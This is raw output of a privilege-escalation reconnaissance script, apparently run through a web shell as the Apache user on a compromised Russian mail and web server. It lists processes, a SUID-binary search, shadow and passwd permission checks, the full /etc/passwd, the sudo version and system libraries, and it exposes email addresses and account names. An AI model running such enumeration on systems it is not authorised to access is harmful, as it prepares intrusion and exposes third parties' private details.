postfix  32109  0.0  0.0   9996  4296 ?        S    10:10   0:00  \_ smtpd -n smtp -t inet -u -s 3
postfix  32497  0.0  0.0   9996  4296 ?        S    10:15   0:00  \_ smtpd -n smtp -t inet -u -s 3
postfix    993  0.0  0.0   9996  4292 ?        S    10:26   0:00  \_ smtpd -n smtp -t inet -u -s 3
postfix   1996  1.1  0.0   9996  4256 ?        S    10:30   0:00  \_ smtpd -n smtp -t inet -u -s 3
postfix   1997  0.0  0.0   8924  2240 ?        S    10:30   0:00  \_ cleanup -z -t unix -u
postfix   1998  0.0  0.0   8924  2276 ?        S    10:30   0:00  \_ cleanup -z -t unix -u
postfix   1999  0.0  0.0   8964  2204 ?        S    10:30   0:00  \_ smtp -n scan -t unix -u -o smtp_send_xforward_command yes -o smtp_tls_security_level none
postfix   2000  0.0  0.0   8964  2204 ?        S    10:30   0:00  \_ smtp -n scan -t unix -u -o smtp_send_xforward_command yes -o smtp_tls_security_level none
postfix   2002  1.0  0.0   9968  3988 ?        S    10:30   0:00  \_ smtpd -n 127.0.0.1:10026 -t inet -u -o content_filter spam:dummy -o receive_override_options no_unknown_recipient_checks,no_header_body_checks -o smtpd_client_restrictions  -o smtpd_helo_restrictions  -o smtpd_sender_restrictions  -o smtpd_recipient_restrictions permit_mynetworks,reject -o mynetworks 127.0.0.0/8 -o smtpd_authorized_xforward_hosts 127.0.0.0/8
postfix   2004  1.0  0.0   9968  3988 ?        S    10:30   0:00  \_ smtpd -n 127.0.0.1:10026 -t inet -u -o content_filter spam:dummy -o receive_override_options no_unknown_recipient_checks,no_header_body_checks -o smtpd_client_restrictions  -o smtpd_helo_restrictions  -o smtpd_sender_restrictions  -o smtpd_recipient_restrictions permit_mynetworks,reject -o mynetworks 127.0.0.0/8 -o smtpd_authorized_xforward_hosts 127.0.0.0/8
postfix   2008  0.0  0.0   8840  2092 ?        S    10:30   0:00  \_ pipe -n spam -t unix flags=R user=vmail argv=/usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f $sender $recipient
postfix   2011  0.0  0.0   8840  2064 ?        S    10:30   0:00  \_ pipe -n spam -t unix flags=R user=vmail argv=/usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f $sender $recipient
vmail     2012  0.0  0.0   5960  1340 ?        Ss   10:30   0:00  |   \_ /usr/bin/spamc -u vmail -e /usr/sbin/sendmail -f apache@web1.inforotor.ru alexandr.ts@gmail.com ralex@inforotor.ru user@inforotor.ru
postfix   2029  0.0  0.0   8964  2240 ?        S    10:30   0:00  \_ smtp -t unix -u
postfix   2030  0.0  0.0   8968  2472 ?        S    10:30   0:00  \_ virtual -t unix
clamav    7230  1.1  2.4 362536 307976 ?       Ssl  Mar25 2229:15 clamd
root     13473  0.0  0.0   7264  1060 ?        Ss   Jun03   0:54 /usr/sbin/sshd
tomcat   21341  5.7  3.8 738232 480680 ?       Sl   Jul05 2383:34 /usr/java/latest/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djvm=tomcat -Xms384M -Xmx384M -XX:MaxPermSize=200m -Djava.awt.headless=true -Djava.net.preferIPv4Stack=true -Dfile.encoding=UTF-8 -DjavaEncoding=UTF-8 -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/tomcat/endorsed -classpath /opt/tomcat/bin/bootstrap.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
root     21687  0.0  0.0   1980   632 ?        Ss   Jul06   0:15 /usr/sbin/dovecot
nobody   21689  0.0  0.0   8288  2356 ?        S    Jul06   0:20  \_ dovecot-auth
nobody   25211  0.0  0.0   8016  1852 ?        S    08:42   0:00  \_ dovecot-auth -w
dovecot  32642  0.0  0.0   5036  1532 ?        S    10:16   0:00  \_ imap-login
dovecot    761  0.0  0.0   5032  1524 ?        S    10:24   0:00  \_ pop3-login
dovecot    856  0.0  0.0   5032  1772 ?        S    10:25   0:00  \_ pop3-login
dovecot    901  0.0  0.0   5036  1520 ?        S    10:25   0:00  \_ imap-login
dovecot   1860  0.0  0.0   5036  1768 ?        S    10:28   0:00  \_ imap-login
dovecot   1861  0.0  0.0   5032  1824 ?        S    10:28   0:00  \_ pop3-login
root     21765  0.0  0.4  77460 56424 ?        Ss   Jul06   1:54 /usr/sbin/httpd
apache   12062  0.6  0.4  80824 54836 ?        S    Aug02   4:22  \_ /usr/sbin/httpd
apache   14741  0.6  0.4  81848 55572 ?        S    00:11   4:12  \_ /usr/sbin/httpd
apache     975  0.0  0.0   2572  1148 ?        S    10:26   0:00  |   \_ sh new_check_server.sh
apache    1825  1.8  0.0   7740  5612 ?        D    10:28   0:02  |       \_ find / -type f -perm -4000 -exec ls -lha {} ;
apache   16658  0.6  0.4  81204 56964 ?        S    00:37   3:55  \_ /usr/sbin/httpd
apache   20857  0.6  0.4  80824 54912 ?        S    01:30   3:37  \_ /usr/sbin/httpd
apache   21071  0.6  0.4  81080 55092 ?        S    01:32   3:38  \_ /usr/sbin/httpd
apache   24823  0.6  0.4  80824 54976 ?        S    02:18   3:14  \_ /usr/sbin/httpd
apache   10716  0.6  0.4  80824 54780 ?        S    05:39   1:56  \_ /usr/sbin/httpd
apache   10723  0.6  0.4  81080 55024 ?        S    05:39   1:57  \_ /usr/sbin/httpd
apache   18267  0.6  0.4  80824 54904 ?        S    07:13   1:16  \_ /usr/sbin/httpd
apache   18660  0.6  0.4  80824 54884 ?        S    07:19   1:09  \_ /usr/sbin/httpd
apache   18875  0.6  0.4  81080 54980 ?        S    07:22   1:08  \_ /usr/sbin/httpd
apache   23144  0.6  0.4  80824 54916 ?        S    08:15   0:49  \_ /usr/sbin/httpd
apache   23737  0.6  0.4  81080 54952 ?        S    08:22   0:49  \_ /usr/sbin/httpd
apache   23738  0.6  0.4  81080 54872 ?        S    08:22   0:45  \_ /usr/sbin/httpd
apache   23739  0.6  0.4  80824 54888 ?        S    08:22   0:46  \_ /usr/sbin/httpd
apache   25575  0.5  0.4  81848 55456 ?        S    08:47   0:35  \_ /usr/sbin/httpd
apache    2031  0.0  0.0   2568  1008 ?        S    10:30   0:00  |   \_ sh -c sh new_check_server.sh >11.txt
apache    2032  0.0  0.0   2572  1104 ?        S    10:30   0:00  |       \_ sh new_check_server.sh
apache    2041  0.0  0.0   2428   892 ?        R    10:30   0:00  |           \_ ps axfuw
apache   26481  0.5  0.4  80824 54772 ?        S    08:59   0:29  \_ /usr/sbin/httpd
apache   26486  0.6  0.4  82104 56172 ?        S    08:59   0:33  \_ /usr/sbin/httpd
apache   26720  0.6  0.4  81080 54936 ?        S    09:02   0:32  \_ /usr/sbin/httpd
apache   29504  0.6  0.4  82360 56404 ?        S    09:37   0:21  \_ /usr/sbin/httpd
root      4666  0.0  0.3  50620 42072 ?        Ss   04:24   0:03 /usr/bin/spamd -d -c -m5 -H -u nobody -r /var/run/spamd.pid
nobody    4675  3.3  0.6  90524 81580 ?        S    04:24  12:09  \_ spamd child
nobody    4676  2.9  0.7  97544 88272 ?        R    04:24  10:46  \_ spamd child

[+]mount:
/dev/mapper/hoster-root on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md0 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
nfsd on /proc/fs/nfsd type nfsd (rw)

[+]df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/hoster-root
                      288G  268G   14G  96% /
/dev/md0              243M   19M  222M   8% /boot
tmpfs                 6.0G     0  6.0G   0% /dev/shm

[+]cat /etc/fstab
/dev/hoster/root         /                       ext3    defaults        1 1
/dev/md0                /boot                   ext3    defaults        1 2
tmpfs                   /dev/shm                tmpfs   defaults        0 0
devpts                  /dev/pts                devpts  gid=5,mode=620  0 0
sysfs                   /sys                    sysfs   defaults        0 0
proc                    /proc                   proc    defaults        0 0
/dev/hoster/swap         swap                    swap    defaults        0 0
**************************************************
*             security fails                     *
*                                                *
**************************************************
[+]mmap_min_addr:
[+]Parse /etc for Writeable files
[+] check /etc/shadow PERM
-r-------- 1 root root 1.3K Apr  8  2011 /etc/shadow
[+] check /etc/passwd PERM
-rw-r--r-- 1 root root 2.1K Jan 29  2013 /etc/passwd
[+]FHS root (ls -lha /):
total 94K
drwxr-xr-x  21 root root 4.0K Jun 11 16:54 .
drwxr-xr-x  21 root root 4.0K Jun 11 16:54 ..
-rw-r--r--   1 root root    0 Mar 31  2011 .autofsck
-rw-r--r--   1 root root    0 May 16  2008 .autorelabel
drwxr-xr-x   2 root root 4.0K Jul 17 04:06 bin
drwxr-xr-x   4 root root 6.0K Jul 16 12:41 boot
drwxr-xr-x  11 root root 3.4K Jan 29  2013 dev
drwxr-xr-x  74 root root 4.0K Aug  2 04:04 etc
drwxr-xr-x   8 root root 4.0K May 11  2011 home
drwxr-xr-x  13 root root 4.0K Jun 25 04:08 lib
drwx------   2 root root  16K May 15  2008 lost+found
drwxr-xr-x   2 root root 4.0K May 11  2011 media
drwxr-xr-x   2 root root 4.0K May 11  2011 mnt
drwxr-xr-x   6 root root 4.0K Jun  6 01:14 opt
dr-xr-xr-x 266 root root    0 May 11  2011 proc
drwxr-x---   6 root root 4.0K Jun  6 00:36 root
drwxr-xr-x   2 root root  12K Jun 19 04:07 sbin
drwxr-xr-x   2 root root 4.0K May 11  2011 selinux
drwxr-xr-x   2 root root 4.0K May 11  2011 srv
drwxr-xr-x  11 root root    0 May 11  2011 sys
drwxrwxrwt   4 root root 4.0K Aug  3 10:30 tmp
drwxr-xr-x  15 root root 4.0K May 12  2011 usr
drwxr-xr-x  24 root root 4.0K May 12  2011 var
[+]Search core dumps...
Sudo version 1.7.2p1
**************************************************
*             av, firewalls                      *
*                                                *
**************************************************
chkrootkit:
rkhunter:
clamav:
**************************************************
*             Usefull                            *
*                                                *
**************************************************
[+] Python
[+] Php
PHP 5.3.6 (cli) (built: Apr  5 2011 00:29:40) 
Copyright (c) 1997-2011 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
[+] Perl

This is perl, v5.8.8 built for i386-linux-thread-multi

Copyright 1987-2006, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

[+]gcc -v
[+]Ruby -v
**************************************************
*             users info                         *
*                                                *
**************************************************
[+] All users:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
user:x:500:500:Nik:/home/user:/bin/bash
fuks:x:501:501:Is:/home/fuks:/bin/bash
hoster:x:502:502:V:/home/hoster:/bin/bash
vmail:x:1000:12::/var/spool/vmail:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
souser:x:1001:1001:Spamooborona filter:/var/yamail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
giver:x:1002:1002::/home/giver:/bin/bash
webmaster:x:600:600:webmaster:/home/webmaster:/bin/bash
zabbix:x:100:101:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
memcached:x:101:102:Memcached daemon:/var/run/memcached:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
clamav:x:102:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
tomcat:x:46:99:Tomcat JVM user.:/opt/tomcat/temp:/sbin/nologin
irotor:x:1003:1003::/home/irotor:/bin/bash

[+]Chek HOMEs for users with UID>500:

[+]check perm user(uid=500;gid=500) HOME=/home/user:
drwx------ 9 user user 4.0K 2011-08-02 15:31:39.000000000 +0400 /home/user
[+]check perm fuks(uid=501;gid=501) HOME=/home/fuks:
drwx------ 12 fuks fuks 4.0K 2013-06-24 18:52:42.000000000 +0400 /home/fuks
[+]check perm hoster(uid=502;gid=502) HOME=/home/hoster:
drwx------ 4 hoster hoster 4.0K 2008-11-27 18:12:43.000000000 +0300 /home/hoster
[+]check perm vmail(uid=1000;gid=12) HOME=/var/spool/vmail:
drwxr-xr-x 8 vmail mail 4.0K 2010-04-23 18:46:36.000000000 +0400 /var/spool/vmail
[+]check perm souser(uid=1001;gid=1001) HOME=/var/yamail:
drwxr-xr-x 2 root root 4.0K 2008-09-11 17:12:48.000000000 +0400 /var/yamail
[+]check perm giver(uid=1002;gid=1002) HOME=/home/giver:
drwx------ 11 giver giver 4.0K 2011-09-26 15:00:26.000000000 +0400 /home/giver
[+]check perm webmaster(uid=600;gid=600) HOME=/home/webmaster:
drwx------ 11 webmaster webmaster 4.0K 2013-06-11 19:22:20.000000000 +0400 /home/webmaster
[+]check perm nfsnobody(uid=65534;gid=65534) HOME=/var/lib/nfs:
drwxr-xr-x 5 root root 4.0K 2013-08-03 04:31:49.000000000 +0400 /var/lib/nfs
[+]check perm irotor(uid=1003;gid=1003) HOME=/home/irotor:
drwx------ 3 irotor irotor 4.0K 2011-04-08 20:46:47.000000000 +0400 /home/irotor
**************************************************
*             library info                       *
*                                                *
**************************************************
[+]LIBC:
2013-05-31 /lib/libc-2.5.so
[+]ALL from /lib /lib64 (sort -u):
-r--r--r--  1 root root  45K 2012-02-22 21:26:24.000000000 +0400 libdevmapper-event.a
-r--r--r--  1 root root 3.9M 2013-01-09 13:00:01.000000000 +0400 liblvm2cmd.a
-r--r--r--  1 root root 485K 2012-02-22 21:26:17.000000000 +0400 libdevmapper.a
-r-xr-xr-x  1 root root  20K 2011-07-22 09:07:40.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
-r-xr-xr-x  1 root root  20K 2012-02-22 21:26:32.000000000 +0400 libdevmapper-event.so.1.02
-r-xr-xr-x  1 root root 162K 2012-02-22 21:26:32.000000000 +0400 libdevmapper.so.1.02
-r-xr-xr-x  1 root root 217K 2011-07-22 09:07:40.000000000 +0400 libdmraid.so.1.0.0.rc13-17
-r-xr-xr-x  1 root root 5.0K 2013-01-09 13:00:04.000000000 +0400 libdevmapper-event-lvm2.so.2.02
-r-xr-xr-x  1 root root 858K 2013-01-09 13:00:03.000000000 +0400 liblvm2cmd.so.2.02
-rw-r--r--  1 root root   65 2013-03-05 15:27:05.000000000 +0400 .libcrypto.so.0.9.8e.hmac
-rw-r--r--  1 root root   65 2013-03-05 15:27:05.000000000 +0400 .libssl.so.0.9.8e.hmac
-rwxr-xr-x  1 root root  10K 2013-01-09 09:30:33.000000000 +0400 libpam_misc.so.0.81.2
-rwxr-xr-x  1 root root  12K 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
-rwxr-xr-x  1 root root  12K 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  13K 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
-rwxr-xr-x  1 root root  14K 2013-05-31 02:19:03.000000000 +0400 libanl-2.5.so
-rwxr-xr-x  1 root root  15K 2013-05-31 02:19:05.000000000 +0400 libutil-2.5.so
-rwxr-xr-x  1 root root  16K 2007-01-06 08:12:05.000000000 +0300 libattr.so.1.1.0
-rwxr-xr-x  1 root root  16K 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
-rwxr-xr-x  1 root root  16K 2013-05-09 15:10:58.000000000 +0400 libuuid.so.1.2
-rwxr-xr-x  1 root root  17K 2013-05-31 02:19:03.000000000 +0400 libSegFault.so
-rwxr-xr-x  1 root root  20K 2011-07-22 09:07:41.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
-rwxr-xr-x  1 root root  21K 2013-05-09 15:10:58.000000000 +0400 libss.so.2.0
-rwxr-xr-x  1 root root  21K 2013-05-31 02:19:04.000000000 +0400 libdl-2.5.so
-rwxr-xr-x  1 root root  22K 2013-05-09 15:10:58.000000000 +0400 libe2p.so.2.3
-rwxr-xr-x  1 root root  22K 2013-05-31 02:19:04.000000000 +0400 libnss_dns-2.5.so
-rwxr-xr-x  1 root root  23K 2013-05-31 02:19:05.000000000 +0400 libnss_hesiod-2.5.so
-rwxr-xr-x  1 root root  26K 2012-02-22 17:57:47.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x  1 root root  33K 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
-rwxr-xr-x  1 root root  35K 2013-05-31 02:19:05.000000000 +0400 libthread_db-1.0.so
-rwxr-xr-x  1 root root  36K 2013-05-31 02:19:04.000000000 +0400 libnss_compat-2.5.so
-rwxr-xr-x  1 root root  38K 2013-01-09 10:09:06.000000000 +0400 libvolume_id.so.0.66.0
-rwxr-xr-x  1 root root  38K 2013-05-09 15:10:58.000000000 +0400 libblkid.so.1.0
-rwxr-xr-x  1 root root  44K 2013-01-09 09:30:33.000000000 +0400 libpam.so.0.81.5
-rwxr-xr-x  1 root root  45K 2013-05-31 02:19:04.000000000 +0400 libcrypt-2.5.so
-rwxr-xr-x  1 root root  46K 2013-01-08 22:20:59.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
-rwxr-xr-x  1 root root  46K 2013-05-31 02:19:05.000000000 +0400 libnss_nis-2.5.so
-rwxr-xr-x  1 root root  48K 2013-05-31 02:19:05.000000000 +0400 librt-2.5.so
-rwxr-xr-x  1 root root  50K 2013-05-31 02:19:04.000000000 +0400 libnss_files-2.5.so
-rwxr-xr-x  1 root root  54K 2013-01-09 09:43:31.000000000 +0400 libproc-3.2.7.so
-rwxr-xr-x  1 root root  55K 2013-05-31 02:19:05.000000000 +0400 libnss_nisplus-2.5.so
-rwxr-xr-x  1 root root  58K 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
-rwxr-xr-x  1 root root  74K 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
-rwxr-xr-x  1 root root  83K 2013-05-31 02:19:05.000000000 +0400 libresolv-2.5.so
-rwxr-xr-x  1 root root  92K 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
-rwxr-xr-x  1 root root  95K 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
-rwxr-xr-x  1 root root 1.3M 2013-03-05 15:27:05.000000000 +0400 libcrypto.so.0.9.8e
-rwxr-xr-x  1 root root 1.7M 2013-05-31 02:19:04.000000000 +0400 libc-2.5.so
-rwxr-xr-x  1 root root 108K 2013-05-31 02:19:04.000000000 +0400 libnsl-2.5.so
-rwxr-xr-x  1 root root 113K 2013-05-09 15:10:58.000000000 +0400 libext2fs.so.2.4
-rwxr-xr-x  1 root root 127K 2011-03-31 04:08:14.000000000 +0400 libpcre.so.0.0.1
-rwxr-xr-x  1 root root 128K 2013-05-31 02:19:03.000000000 +0400 ld-2.5.so
-rwxr-xr-x  1 root root 133K 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
-rwxr-xr-x  1 root root 135K 2013-05-31 02:19:05.000000000 +0400 libpthread-2.5.so
-rwxr-xr-x  1 root root 156K 2009-09-04 02:49:09.000000000 +0400 libsemanage.so.1
-rwxr-xr-x  1 root root 188K 2013-05-31 02:19:04.000000000 +0400 libcidn-2.5.so
-rwxr-xr-x  1 root root 212K 2013-05-31 02:19:04.000000000 +0400 libm-2.5.so
-rwxr-xr-x  1 root root 215K 2011-07-22 09:07:41.000000000 +0400 libdmraid.so.1.0.0.rc13
-rwxr-xr-x  1 root root 240K 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
-rwxr-xr-x  1 root root 248K 2011-08-11 21:33:53.000000000 +0400 libdbus-1.so.3.4.0
-rwxr-xr-x  1 root root 254K 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
-rwxr-xr-x  1 root root 294K 2013-03-05 15:27:05.000000000 +0400 libssl.so.0.9.8e
-rwxr-xr-x  1 root root 630K 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
-rwxr-xr-x  1 root root 7.5K 2013-05-31 02:19:03.000000000 +0400 libBrokenLocale-2.5.so
-rwxr-xr-x  1 root root 7.7K 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
-rwxr-xr-x  1 root root 7.7K 2013-05-09 15:10:58.000000000 +0400 libcom_err.so.2.1
-rwxr-xr-x  1 root root 9.7K 2013-01-09 09:30:33.000000000 +0400 libpamc.so.0.81.0
-rwxr-xr-x  1 root root 989K 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
/lib/:
drwxr-xr-x  2 root root 4.0K 2012-11-06 17:30:36.000000000 +0400 iptables
drwxr-xr-x  2 root root 4.0K 2013-01-29 13:36:04.000000000 +0400 device-mapper
drwxr-xr-x  2 root root 4.0K 2013-01-29 13:36:34.000000000 +0400 firmware
drwxr-xr-x  2 root root 4.0K 2013-05-29 13:33:35.000000000 +0400 bdevid
drwxr-xr-x  2 root root 4.0K 2013-06-04 04:07:57.000000000 +0400 dbus-1
drwxr-xr-x  3 root root 4.0K 2013-01-29 13:35:51.000000000 +0400 security
drwxr-xr-x  3 root root 4.0K 2013-05-31 01:39:08.000000000 +0400 i686
drwxr-xr-x  3 root root 4.0K 2013-06-03 04:25:32.000000000 +0400 rtkaio
drwxr-xr-x  3 root root 4.0K 2013-06-04 04:07:56.000000000 +0400 udev
drwxr-xr-x  4 root root 4.0K 2013-07-16 12:41:48.000000000 +0400 modules
drwxr-xr-x  6 root root 4.0K 2013-01-09 07:15:07.000000000 +0400 kbd
drwxr-xr-x 13 root root 4.0K 2013-06-25 04:08:32.000000000 +0400 .
drwxr-xr-x 21 root root 4.0K 2013-06-11 16:54:24.000000000 +0400 ..
lrwxrwxrwx  1 root root    9 2013-06-03 04:25:32.000000000 +0400 ld-linux.so.2 -> ld-2.5.so
lrwxrwxrwx  1 root root   11 2013-06-03 04:25:32.000000000 +0400 libc.so.6 -> libc-2.5.so
lrwxrwxrwx  1 root root   11 2013-06-03 04:25:32.000000000 +0400 libm.so.6 -> libm-2.5.so
lrwxrwxrwx  1 root root   12 2013-05-20 14:40:28.000000000 +0400 libss.so.2 -> libss.so.2.0
lrwxrwxrwx  1 root root   12 2013-06-03 04:25:32.000000000 +0400 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx  1 root root   12 2013-06-03 04:25:32.000000000 +0400 librt.so.1 -> librt-2.5.so
lrwxrwxrwx  1 root root   13 2013-01-29 13:35:42.000000000 +0400 libz.so.1 -> libz.so.1.2.3
lrwxrwxrwx  1 root root   13 2013-01-29 13:36:59.000000000 +0400 libz.so -> libz.so.1.2.3
lrwxrwxrwx  1 root root   13 2013-05-20 14:40:28.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
lrwxrwxrwx  1 root root   13 2013-06-03 04:25:32.000000000 +0400 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx  1 root root   13 2013-06-03 04:25:32.000000000 +0400 libnsl.so.1 -> libnsl-2.5.so
lrwxrwxrwx  1 root root   14 2011-03-21 17:17:31.000000000 +0300 libcap.so.1 -> libcap.so.1.10
lrwxrwxrwx  1 root root   14 2013-01-29 13:36:24.000000000 +0400 cpp -> ../usr/bin/cpp
lrwxrwxrwx  1 root root   14 2013-05-20 14:40:28.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
lrwxrwxrwx  1 root root   14 2013-06-03 04:25:32.000000000 +0400 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx  1 root root   14 2013-06-03 04:25:32.000000000 +0400 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx  1 root root   15 2012-03-15 04:23:01.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
lrwxrwxrwx  1 root root   15 2013-05-20 14:40:28.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
lrwxrwxrwx  1 root root   15 2013-06-03 04:25:32.000000000 +0400 libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx  1 root root   16 2011-03-21 17:17:31.000000000 +0300 libattr.so.1 -> libattr.so.1.1.0
lrwxrwxrwx  1 root root   16 2011-03-21 17:17:31.000000000 +0300 libwrap.so.0 -> libwrap.so.0.7.6
lrwxrwxrwx  1 root root   16 2011-04-22 11:51:57.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
lrwxrwxrwx  1 root root   16 2013-01-29 13:35:51.000000000 +0400 libpam.so.0 -> libpam.so.0.81.5
lrwxrwxrwx  1 root root   16 2013-03-14 15:11:44.000000000 +0400 libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx  1 root root   16 2013-05-20 14:40:28.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
lrwxrwxrwx  1 root root   16 2013-06-03 04:25:32.000000000 +0400 libresolv.so.2 -> libresolv-2.5.so
lrwxrwxrwx  1 root root   17 2012-03-15 04:22:55.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
lrwxrwxrwx  1 root root   17 2012-06-14 15:46:41.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
lrwxrwxrwx  1 root root   17 2013-01-29 13:35:51.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
lrwxrwxrwx  1 root root   17 2013-05-20 14:40:28.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.5.so
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.5.so
lrwxrwxrwx  1 root root   17 2013-06-03 04:25:32.000000000 +0400 libpthread.so.0 -> libpthread-2.5.so
lrwxrwxrwx  1 root root   18 2011-03-21 17:17:31.000000000 +0300 libkeyutils.so.1 -> libkeyutils-1.2.so
lrwxrwxrwx  1 root root   18 2011-09-18 00:35:43.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
lrwxrwxrwx  1 root root   18 2013-01-29 13:36:04.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
lrwxrwxrwx  1 root root   19 2011-03-21 17:17:31.000000000 +0300 libtermcap.so.2 -> libtermcap.so.2.0.8
lrwxrwxrwx  1 root root   19 2012-03-15 04:22:55.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
lrwxrwxrwx  1 root root   19 2013-03-14 15:11:44.000000000 +0400 libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx  1 root root   19 2013-06-03 04:25:32.000000000 +0400 libnss_files.so.2 -> libnss_files-2.5.so
lrwxrwxrwx  1 root root   19 2013-06-03 04:25:32.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
lrwxrwxrwx  1 root root   20 2012-03-15 04:22:56.000000000 +0400 libdevmapper.so -> libdevmapper.so.1.02
lrwxrwxrwx  1 root root   20 2013-06-03 04:25:32.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.5.so
lrwxrwxrwx  1 root root   20 2013-06-03 04:25:32.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
lrwxrwxrwx  1 root root   21 2013-01-29 13:35:51.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.2
lrwxrwxrwx  1 root root   21 2013-06-03 04:25:32.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx  1 root root   22 2013-01-29 13:36:03.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
lrwxrwxrwx  1 root root   22 2013-03-14 15:11:44.000000000 +0400 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
lrwxrwxrwx  1 root root   22 2013-06-03 04:25:32.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
lrwxrwxrwx  1 root root   23 2011-03-21 17:17:31.000000000 +0300 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
lrwxrwxrwx  1 root root   23 2011-09-18 00:35:43.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
